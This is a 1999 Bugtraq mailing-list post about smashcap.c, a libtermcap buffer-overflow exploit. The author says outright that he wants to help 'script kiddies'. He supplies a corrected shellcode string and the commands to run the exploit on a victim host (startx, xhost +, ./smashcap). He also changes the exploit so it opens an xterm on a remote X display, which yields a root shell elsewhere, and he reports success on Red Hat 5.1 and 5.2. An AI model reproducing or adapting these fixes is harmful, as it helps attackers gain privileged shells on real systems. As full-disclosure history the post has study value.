[11493] in bugtraq
libtermcap exploit fix ... smashcap.c
daemon@ATHENA.MIT.EDU (Hudin Lucian)
Tue Aug 24 14:04:02 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9908230104440.12666-100000@wild.transart.ro>
Date: Mon, 23 Aug 1999 01:18:16 +0300
Reply-To: Hudin Lucian <luci@WILD.TRANSART.RO>
From: Hudin Lucian <luci@WILD.TRANSART.RO>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <E11IW9S-0001fX-00@the-village.bc.nu>
Hi, since bugtraq is a full-disclosure list, let's
help the script kiddies a bit and scare the sysadmins a little bit more...
To make smashcap.c work, all you have to do is remove one
0xff character before /bin/sh in the shellcode,
so the line would be:
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
instead of:
"\x80\xe8\xdc\xff\xff\xff\xff/bin/sh"
Also, you'll have to be on a console running X to exploit it, but
if you have another box where you can start X, then it's ok:
myhost$ startx;xhost +victim.com
victim$ ./smashcap
and modify the last line of smashcap.c to:
execl("/usr/X11R6/bin/xterm","xterm", "-display",
"victim.com:0", 0);
Well, it works on most Red Hats (tested on 5.1 and 5.2).
On Slackware it sigsegvs; you need to work on it a little bit. Sorry, I don't
have a Slackware box to work on.
regards, lucysoft